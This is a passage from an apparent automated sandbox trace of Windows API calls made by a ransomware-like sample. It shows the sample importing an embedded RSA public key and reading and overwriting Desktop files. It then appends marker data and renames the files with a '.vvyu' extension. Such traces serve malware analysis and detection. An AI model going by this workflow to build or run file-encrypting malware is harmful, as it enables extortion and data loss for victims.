KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.827] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.828] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.828] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.828] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.828] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.829] GetLastError () returned 0x0 [0183.829] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.829] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.829] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.829] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.829] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xad90) returned 0x2d43778 [0183.830] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30fd0 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7b0 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31018 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7c8 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7f8 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e858 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e810 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0183.830] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0183.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0183.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e858 [0183.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0183.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e810 [0183.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e7f8 [0183.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0183.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0183.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0183.833] GetCurrentThreadId () returned 0x264 [0183.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce770 [0183.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.834] GetCurrentThreadId () returned 0x264 [0183.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e858 [0183.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7f8 [0183.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e810 [0183.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7e0 [0183.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e870 [0183.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0183.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e840 [0183.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e828 [0183.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e888 [0183.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e828 [0183.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7f8 [0183.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0183.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0183.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0183.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0183.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0183.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0183.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31018 | out: hHeap=0x6a0000) returned 1 [0183.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0183.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0183.845] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xad8c, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xad8c, lpOverlapped=0x0) returned 1 [0183.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.846] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xad91, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.846] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0183.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0183.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.847] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0183.847] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.847] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.847] CloseHandle (hObject=0x584) returned 1 [0183.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d41908 [0183.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.855] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\IabkKD4FQA.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\iabkkd4fqa.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\IabkKD4FQA.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\iabkkd4fqa.wav.vvyu")) returned 1 [0183.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.857] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.860] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9688690, ftCreationTime.dwHighDateTime=0x1d898b4, ftLastAccessTime.dwLowDateTime=0x64a370c0, ftLastAccessTime.dwHighDateTime=0x1d89df9, ftLastWriteTime.dwLowDateTime=0x64a370c0, ftLastWriteTime.dwHighDateTime=0x1d89df9, nFileSizeHigh=0x0, nFileSizeLow=0x1708a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iJReKTqGLBvZe.flv", cAlternateFileName="IJREKT~1.FLV")) returned 1 [0183.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31018 [0183.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31018 | out: hHeap=0x6a0000) returned 1 [0183.861] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\iJReKTqGLBvZe.flv") returned=".flv" [0183.861] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\iJReKTqGLBvZe.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\ijrektqglbvze.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.861] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=94346) returned 1 [0183.861] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.864] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17064, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.864] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.866] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, 